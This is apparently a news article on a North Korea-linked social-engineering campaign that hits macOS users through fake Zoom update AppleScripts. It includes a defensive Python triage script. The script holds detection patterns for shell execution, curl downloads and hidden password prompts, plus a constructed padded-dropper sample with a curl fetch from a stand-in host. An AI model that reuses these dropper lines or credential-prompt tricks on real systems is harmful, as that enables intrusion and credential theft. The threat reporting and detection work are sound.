A new and highly sophisticated cyber campaign linked to North Korea-backed threat actors has been uncovered, targeting macOS users and stealing cryptocurrency holdings, login credentials, and other sensitive personal data. According to Microsoft’s threat intelligence team, the operation relies less on advanced technical exploits and more on social engineering tactics that manipulate users into unknowingly triggering the attack themselves.
The campaign reportedly begins with a fake Zoom meeting invite or software update prompt, where victims are asked to download a file named “Zoom SDK Update.scpt.” Although it appears harmless, the file is actually a compiled AppleScript that opens in macOS Script Editor and is designed to resemble a legitimate software update interface.
Security researchers note that the script contains thousands of deliberately inserted blank lines, pushing the malicious code out of immediate view. This technique is intended to reduce the chances of detection by users reviewing the script. Once executed, the script uses legitimate macOS system utilities to simulate a genuine update process, while malicious code runs silently in the background.
Sapphire Sleet: Lazarus Group Connection
Microsoft has attributed the campaign to a threat cluster tracked as “Sapphire Sleet,” associated with the Lazarus Group and linked to APT38 operations. The group has a long history of targeting financial institutions, cryptocurrency platforms, and technology professionals worldwide.
The attack unfolds in multiple stages. In the initial phase, the script executes trusted macOS tools such as “softwareupdate,” creating the illusion of normal system activity. It then uses “curl” commands to fetch additional payloads from external servers, enabling a multi-stage infection chain that progressively expands control over the compromised system.
Multi-Stage Payloads Steal Sensitive Data
These payloads serve different purposes, including establishing backdoors, collecting system data, and connecting to command-and-control infrastructure. During this process, attackers attempt to bypass macOS security protections and extract sensitive information such as passwords, browser history, Apple Keychain data, Telegram credentials, and cryptocurrency wallet details.
A further concern is the use of Apple-like naming conventions such as “systemupdate.app” and “com.apple.cli,” designed to mimic legitimate system processes. This deception increases user trust and can even prompt victims to enter system passwords, which are then directly harvested by the attackers.
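The blank-line padding, the decoy use of softwareupdate and curl, and the Apple-like naming described above are all visible in the script text itself, so an analyst can triage a suspicious AppleScript before it is ever run. The following Python is an added example for that purpose, not code from Microsoft, Apple or the report: it assumes the script has already been obtained as plain text (on macOS, `osadecompile` turns a compiled .scpt back into source), and the indicator patterns, weights and thresholds are hypothetical starting points rather than published detection rules. The sample input is constructed for the demonstration.

```python
"""Triage heuristics for AppleScript source that may be a padded, update-themed dropper.

Added example. Assumes the script is already available as text (for a
compiled .scpt, `osadecompile file.scpt` on macOS emits the source).
Weights and thresholds are hypothetical starting points.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Generic indicators of the behaviour the report describes. Illustrative
# patterns, not IoCs taken from any specific sample.
INDICATORS = {
    "shell_exec": re.compile(r"do shell script", re.I),
    "downloader": re.compile(r"\b(curl|wget)\b", re.I),
    "update_decoy": re.compile(r"\bsoftwareupdate\b", re.I),
    "apple_mimic": re.compile(r"com\.apple\.[\w.]+|systemupdate\.app", re.I),
    "password_prompt": re.compile(r"with hidden answer|administrator privileges", re.I),
}
WEIGHTS = {"shell_exec": 2, "downloader": 2, "update_decoy": 1, "apple_mimic": 2, "password_prompt": 2}
PADDING_RUN_THRESHOLD = 200  # hypothetical: this many consecutive blank lines is treated as deliberate padding
PADDING_WEIGHT = 3
SUSPICIOUS_SCORE = 5


@dataclass
class Finding:
    total_lines: int
    blank_lines: int
    longest_blank_run: int
    hits: dict[str, list[int]] = field(default_factory=dict)  # indicator -> 1-based line numbers
    score: int = 0

    @property
    def blank_ratio(self) -> float:
        return self.blank_lines / self.total_lines if self.total_lines else 0.0

    @property
    def suspicious(self) -> bool:
        return self.score >= SUSPICIOUS_SCORE


def analyze(source: str) -> Finding:
    """Measure blank-line padding and record which indicator classes appear, and where."""
    lines = source.splitlines()
    finding = Finding(total_lines=len(lines), blank_lines=0, longest_blank_run=0)
    run = 0
    for number, line in enumerate(lines, start=1):
        if not line.strip():
            finding.blank_lines += 1
            run += 1
            finding.longest_blank_run = max(finding.longest_blank_run, run)
            continue
        run = 0
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                finding.hits.setdefault(name, []).append(number)
    # Score each indicator class once, so repetition does not inflate the result.
    finding.score = sum(WEIGHTS[name] for name in finding.hits)
    if finding.longest_blank_run >= PADDING_RUN_THRESHOLD:
        finding.score += PADDING_WEIGHT
    return finding


def report(finding: Finding) -> str:
    """Human-readable summary, including the line numbers an analyst should jump to."""
    verdict = "SUSPICIOUS" if finding.suspicious else "no strong indicators"
    parts = [
        f"{verdict} (score {finding.score})",
        f"lines={finding.total_lines} blank={finding.blank_lines} "
        f"({finding.blank_ratio:.0%}) longest_blank_run={finding.longest_blank_run}",
    ]
    for name, numbers in finding.hits.items():
        parts.append(f"  {name}: lines {numbers}")
    return "\n".join(parts)


# Constructed sample: a decoy header, a long blank block, then the body hidden below it.
CONSTRUCTED_SAMPLE = "\n".join(
    [
        "-- Zoom SDK Update",
        'display dialog "Installing update..." buttons {"OK"}',
    ]
    + [""] * 300
    + [
        'do shell script "softwareupdate --list"',
        'do shell script "curl -fsSL https://example.invalid/update -o /tmp/update"',
        'set pw to text returned of (display dialog "Password:" default answer "" with hidden answer)',
    ]
)

# Constructed benign script for comparison.
BENIGN_SAMPLE = 'tell application "Finder"\n\tactivate\nend tell\n'

if __name__ == "__main__":
    print(report(analyze(CONSTRUCTED_SAMPLE)))
    print()
    print(report(analyze(BENIGN_SAMPLE)))
```

The padding check is the point that generic keyword scanning misses: a user who opens the file in Script Editor sees only the decoy header, while the analyzer reports the longest blank run and the exact line numbers of the commands hidden beneath it. The `apple_mimic` pattern is deliberately low-confidence on its own, since legitimate scripts routinely reference real `com.apple.*` bundle identifiers; it only contributes in combination with shell execution, a downloader or a password prompt.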
LinkedIn Lures and Expert Warnings
Microsoft’s threat intelligence team emphasized that social engineering has become one of the most dangerous tools in modern cyber warfare. According to the team, attackers exploit users’ familiarity with routine digital interactions such as remote support requests, meeting links, and software updates.
Cybersecurity expert and former IPS officer Professor Triveni Singh stated that such attacks rely more on human psychology than technical vulnerabilities. He noted that attackers increasingly focus on exploiting trust, routine behavior, and cognitive shortcuts rather than breaking through system defenses directly.
The report also highlights that the campaign often begins on professional networking platforms such as LinkedIn, where fake recruiter profiles are used to initiate contact. Victims are typically approached with fake job opportunities or technical interview requests, followed by malicious file transfers or meeting links.
Experts warn that such attacks are more dangerous than traditional malware because they combine technical deception with psychological manipulation. Once a victim executes the file, the system can effectively fall under attacker control without triggering obvious security alerts.
Microsoft has shared its findings with Apple, prompting updates to Safari and XProtect security mechanisms aimed at blocking known malicious infrastructure and associated file patterns.
Security experts strongly advise users to avoid executing any unknown scripts, links, or attachments without verification from IT or cybersecurity teams, especially those received via email or messaging platforms.
The campaign is currently considered active, with ongoing efforts by cybersecurity agencies to identify associated infrastructure, command servers, and potential victims across multiple regions.